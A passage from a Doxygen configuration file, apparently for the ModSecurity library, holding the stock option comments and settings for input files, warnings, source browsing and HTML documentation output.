U+3044. # The default value is: NO. ALLOW_UNICODE_NAMES = NO # The OUTPUT_LANGUAGE tag is used to specify the language in which all # documentation generated by doxygen is written. Doxygen will use this # information to generate all constant output in the proper language. # Possible values are: Afrikaans, Arabic, Armenian, Brazilian, Catalan, Chinese, # Chinese-Traditional, Croatian, Czech, Danish, Dutch, English (United States), # Esperanto, Farsi (Persian), Finnish, French, German, Greek, Hungarian, # Indonesian, Italian, Japanese, Japanese-en (Japanese with English messages), # Korean, Korean-en (Korean with English messages), Latvian, Lithuanian, # Macedonian, Norwegian, Persian (Farsi), Polish, Portuguese, Romanian, Russian, # Serbian, Serbian-Cyrillic, Slovak, Slovene, Spanish, Swedish, Turkish, # Ukrainian and Vietnamese. # The default value is: English. OUTPUT_LANGUAGE = English # If the BRIEF_MEMBER_DESC tag is set to YES doxygen will include brief member # descriptions after the members that are listed in the file and class # documentation (similar to Javadoc). Set to NO to disable this. # The default value is: YES. BRIEF_MEMBER_DESC = YES # If the REPEAT_BRIEF tag is set to YES doxygen will prepend the brief # description of a member or function before the detailed description # # Note: If both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the # brief descriptions will be completely suppressed. # The default value is: YES. REPEAT_BRIEF = YES # This tag implements a quasi-intelligent brief description abbreviator that is # used to form the text in various listings. Each string in this list, if found # as the leading text of the brief description, will be stripped from the text # and the result, after processing the whole list, is used as the annotated # text. Otherwise, the brief description is used as-is. If left blank, the # following values are used ($name is automatically replaced with the name of # the entity):The $name class, The $name widget, The $name file, is, provides, # specifies, contains, represents, a, an and the. ABBREVIATE_BRIEF = "The $name class" \ "The $name widget" \ "The $name file" \ is \ provides \ specifies \ contains \ represents \ a \ an \ the # If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then # doxygen will generate a detailed section even if there is only a brief # description. # The default value is: NO. ALWAYS_DETAILED_SEC = NO # If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all # inherited members of a class in the documentation of that class as if those # members were ordinary class members. Constructors, destructors and assignment # operators of the base classes will not be shown. # The default value is: NO. INLINE_INHERITED_MEMB = NO # If the FULL_PATH_NAMES tag is set to YES doxygen will prepend the full path # before files name in the file list and in the header files. If set to NO the # shortest path that makes the file name unique will be used # The default value is: YES. FULL_PATH_NAMES = NO # The STRIP_FROM_PATH tag can be used to strip a user-defined part of the path. # Stripping is only done if one of the specified strings matches the left-hand # part of the path. The tag can be used to show relative paths in the file list. # If left blank the directory from which doxygen is run is used as the path to # strip. # # Note that you can specify absolute paths here, but also relative paths, which # will be relative from the directory where doxygen is started. # This tag requires that the tag FULL_PATH_NAMES is set to YES. STRIP_FROM_PATH = # The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of the # path mentioned in the documentation of a class, which tells the reader which # header file to include in order to use a class. If left blank only the name of # the header file containing the class definition is used. Otherwise one should # specify the list of include paths that are normally passed to the compiler # using the -I flag. STRIP_FROM_INC_PATH = # If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter (but # less readable) file names. This can be useful is your file systems doesn't # support long names like on DOS, Mac, or CD-ROM. # The default value is: NO. SHORT_NAMES = NO # If the JAVADOC_AUTOBRIEF tag is set to YES then doxygen will interpret the # first line (until the first dot) of a Javadoc-style comment as the brief # description. If set to NO, the Javadoc-style will behave just like regular Qt- # style comments (thus requiring an explicit @brief command for a brief # description.) # The default value is: NO. JAVADOC_AUTOBRIEF = NO # If the QT_AUTOBRIEF tag is set to YES then doxygen will interpret the first # line (until the first dot) of a Qt-style comment as the brief description. If # set to NO, the Qt-style will behave just like regular Qt-style comments (thus # requiring an explicit \brief command for a brief description.) # The default value is: NO. QT_AUTOBRIEF = NO # The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make doxygen treat a # multi-line C++ special comment block (i.e. a block of //! or /// comments) as # a brief description. This used to be the default behavior. The new default is # to treat a multi-line C++ comment block as a detailed description. Set this # tag to YES if you prefer the old behavior instead. # # Note that setting this tag to YES also means that rational rose comments are # not recognized any more. # The default value is: NO. MULTILINE_CPP_IS_BRIEF = NO # If the INHERIT_DOCS tag is set to YES then an undocumented member inherits the # documentation from any documented member that it re-implements. # The default value is: YES. INHERIT_DOCS = YES # If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce a # new page for each member. If set to NO, the documentation of a member will be # part of the file/class/namespace that contains it. # The default value is: NO. SEPARATE_MEMBER_PAGES = NO # The TAB_SIZE tag can be used to set the number of spaces in a tab. Doxygen # uses this value to replace tabs by spaces in code fragments. # Minimum value: 1, maximum value: 16, default value: 4. TAB_SIZE = 4 # This tag can be used to specify a number of aliases that act as commands in # the documentation. An alias has the form: # name=value # For example adding # "sideeffect=@par Side Effects:\n" # will allow you to put the command \sideeffect (or @sideeffect) in the # documentation, which will result in a user-defined paragraph with heading # "Side Effects:". You can put \n's in the value part of an alias to insert # newlines. ALIASES = # This tag can be used to specify a number of word-keyword mappings (TCL only). # A mapping has the form "name=value". For example adding "class=itcl::class" # will allow you to use the command class in the itcl::class meaning. TCL_SUBST = # Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C sources # only. Doxygen will then generate output that is more tailored for C. For # instance, some of the names that are used will be different. The list of all # members will be omitted, etc. # The default value is: NO. OPTIMIZE_OUTPUT_FOR_C = NO # Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java or # Python sources only. Doxygen will then generate output that is more tailored # for that language. For instance, namespaces will be presented as packages, # qualified scopes will look different, etc. # The default value is: NO. OPTIMIZE_OUTPUT_JAVA = NO # Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran # sources. Doxygen will then generate output that is tailored for Fortran. # The default value is: NO. OPTIMIZE_FOR_FORTRAN = NO # Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL # sources. Doxygen will then generate output that is tailored for VHDL. # The default value is: NO. OPTIMIZE_OUTPUT_VHDL = NO # Doxygen selects the parser to use depending on the extension of the files it # parses. With this tag you can assign which parser to use for a given # extension. Doxygen has a built-in mapping, but you can override or extend it # using this tag. The format is ext=language, where ext is a file extension, and # language is one of the parsers supported by doxygen: IDL, Java, Javascript, # C#, C, C++, D, PHP, Objective-C, Python, Fortran (fixed format Fortran: # FortranFixed, free formatted Fortran: FortranFree, unknown formatted Fortran: # Fortran. In the later case the parser tries to guess whether the code is fixed # or free formatted code, this is the default for Fortran type files), VHDL. For # instance to make doxygen treat .inc files as Fortran files (default is PHP), # and .f files as C (default is Fortran), use: inc=Fortran f=C. # # Note For files without extension you can use no_extension as a placeholder. # # Note that for custom extensions you also need to set FILE_PATTERNS otherwise # the files are not read by doxygen. EXTENSION_MAPPING = # If the MARKDOWN_SUPPORT tag is enabled then doxygen pre-processes all comments # according to the Markdown format, which allows for more readable # documentation. See http://daringfireball.net/projects/markdown/ for details. # The output of markdown processing is further processed by doxygen, so you can # mix doxygen, HTML, and XML commands with Markdown formatting. Disable only in # case of backward compatibilities issues. # The default value is: YES. MARKDOWN_SUPPORT = YES # When enabled doxygen tries to link words that correspond to documented # classes, or namespaces to their corresponding documentation. Such a link can # be prevented in individual cases by by putting a % sign in front of the word # or globally by setting AUTOLINK_SUPPORT to NO. # The default value is: YES. AUTOLINK_SUPPORT = YES # If you use STL classes (i.e. std::string, std::vector, etc.) but do not want # to include (a tag file for) the STL sources as input, then you should set this # tag to YES in order to let doxygen match functions declarations and # definitions whose arguments contain STL classes (e.g. func(std::string); # versus func(std::string) {}). This also make the inheritance and collaboration # diagrams that involve STL classes more complete and accurate. # The default value is: NO. BUILTIN_STL_SUPPORT = NO # If you use Microsoft's C++/CLI language, you should set this option to YES to # enable parsing support. # The default value is: NO. CPP_CLI_SUPPORT = NO # Set the SIP_SUPPORT tag to YES if your project consists of sip (see: # http://www.riverbankcomputing.co.uk/software/sip/intro) sources only. Doxygen # will parse them like normal C++ but will assume all classes use public instead # of private inheritance when no explicit protection keyword is present. # The default value is: NO. SIP_SUPPORT = NO # For Microsoft's IDL there are propget and propput attributes to indicate # getter and setter methods for a property. Setting this option to YES will make # doxygen to replace the get and set methods by a property in the documentation. # This will only work if the methods are indeed getting or setting a simple # type. If this is not the case, or you want to show the methods anyway, you # should set this option to NO. # The default value is: YES. IDL_PROPERTY_SUPPORT = YES # If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC # tag is set to YES, then doxygen will reuse the documentation of the first # member in the group (if any) for the other members of the group. By default # all members of a group must be documented explicitly. # The default value is: NO. DISTRIBUTE_GROUP_DOC = NO # Set the SUBGROUPING tag to YES to allow class member groups of the same type # (for instance a group of public functions) to be put as a subgroup of that # type (e.g. under the Public Functions section). Set it to NO to prevent # subgrouping. Alternatively, this can be done per class using the # \nosubgrouping command. # The default value is: YES. SUBGROUPING = YES # When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and unions # are shown inside the group in which they are included (e.g. using \ingroup) # instead of on a separate page (for HTML and Man pages) or section (for LaTeX # and RTF). # # Note that this feature does not work in combination with # SEPARATE_MEMBER_PAGES. # The default value is: NO. INLINE_GROUPED_CLASSES = NO # When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and unions # with only public data fields or simple typedef fields will be shown inline in # the documentation of the scope in which they are defined (i.e. file, # namespace, or group documentation), provided this scope is documented. If set # to NO, structs, classes, and unions are shown on a separate page (for HTML and # Man pages) or section (for LaTeX and RTF). # The default value is: NO. INLINE_SIMPLE_STRUCTS = NO # When TYPEDEF_HIDES_STRUCT tag is enabled, a typedef of a struct, union, or # enum is documented as struct, union, or enum with the name of the typedef. So # typedef struct TypeS {} TypeT, will appear in the documentation as a struct # with name TypeT. When disabled the typedef will appear as a member of a file, # namespace, or class. And the struct will be named TypeS. This can typically be # useful for C code in case the coding convention dictates that all compound # types are typedef'ed and only the typedef is referenced, never the tag name. # The default value is: NO. TYPEDEF_HIDES_STRUCT = NO # The size of the symbol lookup cache can be set using LOOKUP_CACHE_SIZE. This # cache is used to resolve symbols given their name and scope. Since this can be # an expensive process and often the same symbol appears multiple times in the # code, doxygen keeps a cache of pre-resolved symbols. If the cache is too small # doxygen will become slower. If the cache is too large, memory is wasted. The # cache size is given by this formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range # is 0..9, the default is 0, corresponding to a cache size of 2^16=65536 # symbols. At the end of a run doxygen will report the cache usage and suggest # the optimal cache size from a speed point of view. # Minimum value: 0, maximum value: 9, default value: 0. LOOKUP_CACHE_SIZE = 0 #--------------------------------------------------------------------------- # Build related configuration options #--------------------------------------------------------------------------- # If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in # documentation are documented, even if no documentation was available. Private # class members and static file members will be hidden unless the # EXTRACT_PRIVATE respectively EXTRACT_STATIC tags are set to YES. # Note: This will also disable the warnings about undocumented members that are # normally produced when WARNINGS is set to YES. # The default value is: NO. EXTRACT_ALL = YES # If the EXTRACT_PRIVATE tag is set to YES all private members of a class will # be included in the documentation. # The default value is: NO. EXTRACT_PRIVATE = NO # If the EXTRACT_PACKAGE tag is set to YES all members with package or internal # scope will be included in the documentation. # The default value is: NO. EXTRACT_PACKAGE = NO # If the EXTRACT_STATIC tag is set to YES all static members of a file will be # included in the documentation. # The default value is: NO. EXTRACT_STATIC = NO # If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs) defined # locally in source files will be included in the documentation. If set to NO # only classes defined in header files are included. Does not have any effect # for Java sources. # The default value is: YES. EXTRACT_LOCAL_CLASSES = YES # This flag is only useful for Objective-C code. When set to YES local methods, # which are defined in the implementation section but not in the interface are # included in the documentation. If set to NO only methods in the interface are # included. # The default value is: NO. EXTRACT_LOCAL_METHODS = NO # If this flag is set to YES, the members of anonymous namespaces will be # extracted and appear in the documentation as a namespace called # 'anonymous_namespace{file}', where file will be replaced with the base name of # the file that contains the anonymous namespace. By default anonymous namespace # are hidden. # The default value is: NO. EXTRACT_ANON_NSPACES = NO # If the HIDE_UNDOC_MEMBERS tag is set to YES, doxygen will hide all # undocumented members inside documented classes or files. If set to NO these # members will be included in the various overviews, but no documentation # section is generated. This option has no effect if EXTRACT_ALL is enabled. # The default value is: NO. HIDE_UNDOC_MEMBERS = NO # If the HIDE_UNDOC_CLASSES tag is set to YES, doxygen will hide all # undocumented classes that are normally visible in the class hierarchy. If set # to NO these classes will be included in the various overviews. This option has # no effect if EXTRACT_ALL is enabled. # The default value is: NO. HIDE_UNDOC_CLASSES = NO # If the HIDE_FRIEND_COMPOUNDS tag is set to YES, doxygen will hide all friend # (class|struct|union) declarations. If set to NO these declarations will be # included in the documentation. # The default value is: NO. HIDE_FRIEND_COMPOUNDS = NO # If the HIDE_IN_BODY_DOCS tag is set to YES, doxygen will hide any # documentation blocks found inside the body of a function. If set to NO these # blocks will be appended to the function's detailed documentation block. # The default value is: NO. HIDE_IN_BODY_DOCS = NO # The INTERNAL_DOCS tag determines if documentation that is typed after a # \internal command is included. If the tag is set to NO then the documentation # will be excluded. Set it to YES to include the internal documentation. # The default value is: NO. INTERNAL_DOCS = NO # If the CASE_SENSE_NAMES tag is set to NO then doxygen will only generate file # names in lower-case letters. If set to YES upper-case letters are also # allowed. This is useful if you have classes or files whose names only differ # in case and if your file system supports case sensitive file names. Windows # and Mac users are advised to set this option to NO. # The default value is: system dependent. CASE_SENSE_NAMES = NO # If the HIDE_SCOPE_NAMES tag is set to NO then doxygen will show members with # their full class and namespace scopes in the documentation. If set to YES the # scope will be hidden. # The default value is: NO. HIDE_SCOPE_NAMES = NO # If the SHOW_INCLUDE_FILES tag is set to YES then doxygen will put a list of # the files that are included by a file in the documentation of that file. # The default value is: YES. SHOW_INCLUDE_FILES = YES # If the SHOW_GROUPED_MEMB_INC tag is set to YES then Doxygen will add for each # grouped member an include statement to the documentation, telling the reader # which file to include in order to use the member. # The default value is: NO. SHOW_GROUPED_MEMB_INC = NO # If the FORCE_LOCAL_INCLUDES tag is set to YES then doxygen will list include # files with double quotes in the documentation rather than with sharp brackets. # The default value is: NO. FORCE_LOCAL_INCLUDES = NO # If the INLINE_INFO tag is set to YES then a tag [inline] is inserted in the # documentation for inline members. # The default value is: YES. INLINE_INFO = YES # If the SORT_MEMBER_DOCS tag is set to YES then doxygen will sort the # (detailed) documentation of file and class members alphabetically by member # name. If set to NO the members will appear in declaration order. # The default value is: YES. SORT_MEMBER_DOCS = YES # If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the brief # descriptions of file, namespace and class members alphabetically by member # name. If set to NO the members will appear in declaration order. Note that # this will also influence the order of the classes in the class list. # The default value is: NO. SORT_BRIEF_DOCS = NO # If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen will sort the # (brief and detailed) documentation of class members so that constructors and # destructors are listed first. If set to NO the constructors will appear in the # respective orders defined by SORT_BRIEF_DOCS and SORT_MEMBER_DOCS. # Note: If SORT_BRIEF_DOCS is set to NO this option is ignored for sorting brief # member documentation. # Note: If SORT_MEMBER_DOCS is set to NO this option is ignored for sorting # detailed member documentation. # The default value is: NO. SORT_MEMBERS_CTORS_1ST = NO # If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the hierarchy # of group names into alphabetical order. If set to NO the group names will # appear in their defined order. # The default value is: NO. SORT_GROUP_NAMES = NO # If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be sorted by # fully-qualified names, including namespaces. If set to NO, the class list will # be sorted only by class name, not including the namespace part. # Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES. # Note: This option applies only to the class list, not to the alphabetical # list. # The default value is: NO. SORT_BY_SCOPE_NAME = NO # If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to do proper # type resolution of all parameters of a function it will reject a match between # the prototype and the implementation of a member function even if there is # only one candidate or it is obvious which candidate to choose by doing a # simple string match. By disabling STRICT_PROTO_MATCHING doxygen will still # accept a match between prototype and implementation in such cases. # The default value is: NO. STRICT_PROTO_MATCHING = NO # The GENERATE_TODOLIST tag can be used to enable ( YES) or disable ( NO) the # todo list. This list is created by putting \todo commands in the # documentation. # The default value is: YES. GENERATE_TODOLIST = YES # The GENERATE_TESTLIST tag can be used to enable ( YES) or disable ( NO) the # test list. This list is created by putting \test commands in the # documentation. # The default value is: YES. GENERATE_TESTLIST = YES # The GENERATE_BUGLIST tag can be used to enable ( YES) or disable ( NO) the bug # list. This list is created by putting \bug commands in the documentation. # The default value is: YES. GENERATE_BUGLIST = YES # The GENERATE_DEPRECATEDLIST tag can be used to enable ( YES) or disable ( NO) # the deprecated list. This list is created by putting \deprecated commands in # the documentation. # The default value is: YES. GENERATE_DEPRECATEDLIST= YES # The ENABLED_SECTIONS tag can be used to enable conditional documentation # sections, marked by \if ... \endif and \cond # ... \endcond blocks. ENABLED_SECTIONS = # The MAX_INITIALIZER_LINES tag determines the maximum number of lines that the # initial value of a variable or macro / define can have for it to appear in the # documentation. If the initializer consists of more lines than specified here # it will be hidden. Use a value of 0 to hide initializers completely. The # appearance of the value of individual variables and macros / defines can be # controlled using \showinitializer or \hideinitializer command in the # documentation regardless of this setting. # Minimum value: 0, maximum value: 10000, default value: 30. MAX_INITIALIZER_LINES = 30 # Set the SHOW_USED_FILES tag to NO to disable the list of files generated at # the bottom of the documentation of classes and structs. If set to YES the list # will mention the files that were used to generate the documentation. # The default value is: YES. SHOW_USED_FILES = YES # Set the SHOW_FILES tag to NO to disable the generation of the Files page. This # will remove the Files entry from the Quick Index and from the Folder Tree View # (if specified). # The default value is: YES. SHOW_FILES = YES # Set the SHOW_NAMESPACES tag to NO to disable the generation of the Namespaces # page. This will remove the Namespaces entry from the Quick Index and from the # Folder Tree View (if specified). # The default value is: YES. SHOW_NAMESPACES = YES # The FILE_VERSION_FILTER tag can be used to specify a program or script that # doxygen should invoke to get the current version for each file (typically from # the version control system). Doxygen will invoke the program by executing (via # popen()) the command command input-file, where command is the value of the # FILE_VERSION_FILTER tag, and input-file is the name of an input file provided # by doxygen. Whatever the program writes to standard output is used as the file # version. For an example see the documentation. FILE_VERSION_FILTER = # The LAYOUT_FILE tag can be used to specify a layout file which will be parsed # by doxygen. The layout file controls the global structure of the generated # output files in an output format independent way. To create the layout file # that represents doxygen's defaults, run doxygen with the -l option. You can # optionally specify a file name after the option, if omitted DoxygenLayout.xml # will be used as the name of the layout file. # # Note that if you run doxygen from a directory containing a file called # DoxygenLayout.xml, doxygen will parse it automatically even if the LAYOUT_FILE # tag is left empty. LAYOUT_FILE = # The CITE_BIB_FILES tag can be used to specify one or more bib files containing # the reference definitions. This must be a list of .bib files. The .bib # extension is automatically appended if omitted. This requires the bibtex tool # to be installed. See also http://en.wikipedia.org/wiki/BibTeX for more info. # For LaTeX the style of the bibliography can be controlled using # LATEX_BIB_STYLE. To use this feature you need bibtex and perl available in the # search path. See also \cite for info how to create references. CITE_BIB_FILES = #--------------------------------------------------------------------------- # Configuration options related to warning and progress messages #--------------------------------------------------------------------------- # The QUIET tag can be used to turn on/off the messages that are generated to # standard output by doxygen. If QUIET is set to YES this implies that the # messages are off. # The default value is: NO. QUIET = NO # The WARNINGS tag can be used to turn on/off the warning messages that are # generated to standard error ( stderr) by doxygen. If WARNINGS is set to YES # this implies that the warnings are on. # # Tip: Turn warnings on while writing the documentation. # The default value is: YES. WARNINGS = YES # If the WARN_IF_UNDOCUMENTED tag is set to YES, then doxygen will generate # warnings for undocumented members. If EXTRACT_ALL is set to YES then this flag # will automatically be disabled. # The default value is: YES. WARN_IF_UNDOCUMENTED = YES # If the WARN_IF_DOC_ERROR tag is set to YES, doxygen will generate warnings for # potential errors in the documentation, such as not documenting some parameters # in a documented function, or documenting parameters that don't exist or using # markup commands wrongly. # The default value is: YES. WARN_IF_DOC_ERROR = YES # This WARN_NO_PARAMDOC option can be enabled to get warnings for functions that # are documented, but have no documentation for their parameters or return # value. If set to NO doxygen will only warn about wrong or incomplete parameter # documentation, but not about the absence of documentation. # The default value is: NO. WARN_NO_PARAMDOC = NO # The WARN_FORMAT tag determines the format of the warning messages that doxygen # can produce. The string should contain the $file, $line, and $text tags, which # will be replaced by the file and line number from which the warning originated # and the warning text. Optionally the format may contain $version, which will # be replaced by the version of the file (if it could be obtained via # FILE_VERSION_FILTER) # The default value is: $file:$line: $text. WARN_FORMAT = "$file:$line: $text" # The WARN_LOGFILE tag can be used to specify a file to which warning and error # messages should be written. If left blank the output is written to standard # error (stderr). WARN_LOGFILE = #--------------------------------------------------------------------------- # Configuration options related to the input files #--------------------------------------------------------------------------- # The INPUT tag is used to specify the files and/or directories that contain # documented source files. You may enter file names like myfile.cpp or # directories like /usr/src/myproject. Separate the files or directories with # spaces. # Note: If this tag is empty the current directory is searched. INPUT = ../headers/modsecurity/modsecurity.h ../src ../headers # This tag can be used to specify the character encoding of the source files # that doxygen parses. Internally doxygen uses the UTF-8 encoding. Doxygen uses # libiconv (or the iconv built into libc) for the transcoding. See the libiconv # documentation (see: http://www.gnu.org/software/libiconv) for the list of # possible encodings. # The default value is: UTF-8. INPUT_ENCODING = UTF-8 # If the value of the INPUT tag contains directories, you can use the # FILE_PATTERNS tag to specify one or more wildcard patterns (like *.cpp and # *.h) to filter out the source-files in the directories. If left blank the # following patterns are tested:*.c, *.cc, *.cxx, *.cpp, *.c++, *.java, *.ii, # *.ixx, *.ipp, *.i++, *.inl, *.idl, *.ddl, *.odl, *.h, *.hh, *.hxx, *.hpp, # *.h++, *.cs, *.d, *.php, *.php4, *.php5, *.phtml, *.inc, *.m, *.markdown, # *.md, *.mm, *.dox, *.py, *.f90, *.f, *.for, *.tcl, *.vhd, *.vhdl, *.ucf, # *.qsf, *.as and *.js. FILE_PATTERNS = *.c \ *.cc \ *.cxx \ *.cpp \ *.c++ \ *.java \ *.ii \ *.ixx \ *.ipp \ *.i++ \ *.inl \ *.idl \ *.ddl \ *.odl \ *.h \ *.hh \ *.hxx \ *.hpp \ *.h++ \ *.cs \ *.d \ *.php \ *.php4 \ *.php5 \ *.phtml \ *.inc \ *.m \ *.markdown \ *.md \ *.mm \ *.dox \ *.py \ *.f90 \ *.f \ *.for \ *.tcl \ *.vhd \ *.vhdl \ *.ucf \ *.qsf \ *.as \ *.js # The RECURSIVE tag can be used to specify whether or not subdirectories should # be searched for input files as well. # The default value is: NO. RECURSIVE = YES # The EXCLUDE tag can be used to specify files and/or directories that should be # excluded from the INPUT source files. This way you can easily exclude a # subdirectory from a directory tree whose root is specified with the INPUT tag. # # Note that relative paths are relative to the directory from which doxygen is # run. EXCLUDE = # The EXCLUDE_SYMLINKS tag can be used to select whether or not files or # directories that are symbolic links (a Unix file system feature) are excluded # from the input. # The default value is: NO. EXCLUDE_SYMLINKS = NO # If the value of the INPUT tag contains directories, you can use the # EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude # certain files from those directories. # # Note that the wildcards are matched against the file with absolute path, so to # exclude all test directories for example use the pattern */test/* EXCLUDE_PATTERNS = # The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names # (namespaces, classes, functions, etc.) that should be excluded from the # output. The symbol name can be a fully qualified name, a word, or if the # wildcard * is used, a substring. Examples: ANamespace, AClass, # AClass::ANamespace, ANamespace::*Test # # Note that the wildcards are matched against the file with absolute path, so to # exclude all test directories use the pattern */test/* EXCLUDE_SYMBOLS = # The EXAMPLE_PATH tag can be used to specify one or more files or directories # that contain example code fragments that are included (see the \include # command). EXAMPLE_PATH = # If the value of the EXAMPLE_PATH tag contains directories, you can use the # EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp and # *.h) to filter out the source-files in the directories. If left blank all # files are included. EXAMPLE_PATTERNS = * # If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be # searched for input files to be used with the \include or \dontinclude commands # irrespective of the value of the RECURSIVE tag. # The default value is: NO. EXAMPLE_RECURSIVE = NO # The IMAGE_PATH tag can be used to specify one or more files or directories # that contain images that are to be included in the documentation (see the # \image command). IMAGE_PATH = # The INPUT_FILTER tag can be used to specify a program that doxygen should # invoke to filter for each input file. Doxygen will invoke the filter program # by executing (via popen()) the command: # # # # where is the value of the INPUT_FILTER tag, and is the # name of an input file. Doxygen will then use the output that the filter # program writes to standard output. If FILTER_PATTERNS is specified, this tag # will be ignored. # # Note that the filter must not add or remove lines; it is applied before the # code is scanned, but not when the output code is generated. If lines are added # or removed, the anchors will not be placed correctly. INPUT_FILTER = # The FILTER_PATTERNS tag can be used to specify filters on a per file pattern # basis. Doxygen will compare the file name with each pattern and apply the # filter if there is a match. The filters are a list of the form: pattern=filter # (like *.cpp=my_cpp_filter). See INPUT_FILTER for further information on how # filters are used. If the FILTER_PATTERNS tag is empty or if none of the # patterns match the file name, INPUT_FILTER is applied. FILTER_PATTERNS = # If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using # INPUT_FILTER ) will also be used to filter the input files that are used for # producing the source files to browse (i.e. when SOURCE_BROWSER is set to YES). # The default value is: NO. FILTER_SOURCE_FILES = NO # The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file # pattern. A pattern will override the setting for FILTER_PATTERN (if any) and # it is also possible to disable source filtering for a specific pattern using # *.ext= (so without naming a filter). # This tag requires that the tag FILTER_SOURCE_FILES is set to YES. FILTER_SOURCE_PATTERNS = # If the USE_MDFILE_AS_MAINPAGE tag refers to the name of a markdown file that # is part of the input, its contents will be placed on the main page # (index.html). This can be useful if you have a project on for instance GitHub # and want to reuse the introduction page also for the doxygen output. USE_MDFILE_AS_MAINPAGE = #--------------------------------------------------------------------------- # Configuration options related to source browsing #--------------------------------------------------------------------------- # If the SOURCE_BROWSER tag is set to YES then a list of source files will be # generated. Documented entities will be cross-referenced with these sources. # # Note: To get rid of all source code in the generated output, make sure that # also VERBATIM_HEADERS is set to NO. # The default value is: NO. SOURCE_BROWSER = YES # Setting the INLINE_SOURCES tag to YES will include the body of functions, # classes and enums directly into the documentation. # The default value is: NO. INLINE_SOURCES = NO # Setting the STRIP_CODE_COMMENTS tag to YES will instruct doxygen to hide any # special comment blocks from generated source code fragments. Normal C, C++ and # Fortran comments will always remain visible. # The default value is: YES. STRIP_CODE_COMMENTS = YES # If the REFERENCED_BY_RELATION tag is set to YES then for each documented # function all documented functions referencing it will be listed. # The default value is: NO. REFERENCED_BY_RELATION = NO # If the REFERENCES_RELATION tag is set to YES then for each documented function # all documented entities called/used by that function will be listed. # The default value is: NO. REFERENCES_RELATION = NO # If the REFERENCES_LINK_SOURCE tag is set to YES and SOURCE_BROWSER tag is set # to YES, then the hyperlinks from functions in REFERENCES_RELATION and # REFERENCED_BY_RELATION lists will link to the source code. Otherwise they will # link to the documentation. # The default value is: YES. REFERENCES_LINK_SOURCE = YES # If SOURCE_TOOLTIPS is enabled (the default) then hovering a hyperlink in the # source code will show a tooltip with additional information such as prototype, # brief description and links to the definition and documentation. Since this # will make the HTML file larger and loading of large files a bit slower, you # can opt to disable this feature. # The default value is: YES. # This tag requires that the tag SOURCE_BROWSER is set to YES. SOURCE_TOOLTIPS = YES # If the USE_HTAGS tag is set to YES then the references to source code will # point to the HTML generated by the htags(1) tool instead of doxygen built-in # source browser. The htags tool is part of GNU's global source tagging system # (see http://www.gnu.org/software/global/global.html). You will need version # 4.8.6 or higher. # # To use it do the following: # - Install the latest version of global # - Enable SOURCE_BROWSER and USE_HTAGS in the config file # - Make sure the INPUT points to the root of the source tree # - Run doxygen as normal # # Doxygen will invoke htags (and that will in turn invoke gtags), so these # tools must be available from the command line (i.e. in the search path). # # The result: instead of the source browser generated by doxygen, the links to # source code will now point to the output of htags. # The default value is: NO. # This tag requires that the tag SOURCE_BROWSER is set to YES. USE_HTAGS = NO # If the VERBATIM_HEADERS tag is set the YES then doxygen will generate a # verbatim copy of the header file for each class for which an include is # specified. Set to NO to disable this. # See also: Section \class. # The default value is: YES. VERBATIM_HEADERS = YES # If the CLANG_ASSISTED_PARSING tag is set to YES, then doxygen will use the # clang parser (see: http://clang.llvm.org/) for more accurate parsing at the # cost of reduced performance. This can be particularly helpful with template # rich C++ code for which doxygen's built-in parser lacks the necessary type # information. # Note: The availability of this option depends on whether or not doxygen was # compiled with the --with-libclang option. # The default value is: NO. CLANG_ASSISTED_PARSING = NO # If clang assisted parsing is enabled you can provide the compiler with command # line options that you would normally use when invoking the compiler. Note that # the include paths will already be set by doxygen for the files and directories # specified with INPUT and INCLUDE_PATH. # This tag requires that the tag CLANG_ASSISTED_PARSING is set to YES. CLANG_OPTIONS = #--------------------------------------------------------------------------- # Configuration options related to the alphabetical class index #--------------------------------------------------------------------------- # If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index of all # compounds will be generated. Enable this if the project contains a lot of # classes, structs, unions or interfaces. # The default value is: YES. ALPHABETICAL_INDEX = YES # The COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns in # which the alphabetical index list will be split. # Minimum value: 1, maximum value: 20, default value: 5. # This tag requires that the tag ALPHABETICAL_INDEX is set to YES. COLS_IN_ALPHA_INDEX = 5 # In case all classes in a project start with a common prefix, all classes will # be put under the same header in the alphabetical index. The IGNORE_PREFIX tag # can be used to specify a prefix (or a list of prefixes) that should be ignored # while generating the index headers. # This tag requires that the tag ALPHABETICAL_INDEX is set to YES. IGNORE_PREFIX = #--------------------------------------------------------------------------- # Configuration options related to the HTML output #--------------------------------------------------------------------------- # If the GENERATE_HTML tag is set to YES doxygen will generate HTML output # The default value is: YES. GENERATE_HTML = YES # The HTML_OUTPUT tag is used to specify where the HTML docs will be put. If a # relative path is entered the value of OUTPUT_DIRECTORY will be put in front of # it. # The default directory is: html. # This tag requires that the tag GENERATE_HTML is set to YES. HTML_OUTPUT = html # The HTML_FILE_EXTENSION tag can be used to specify the file extension for each # generated HTML page (for example: .htm, .php, .asp). # The default value is: .html. # This tag requires that the tag GENERATE_HTML is set to YES. 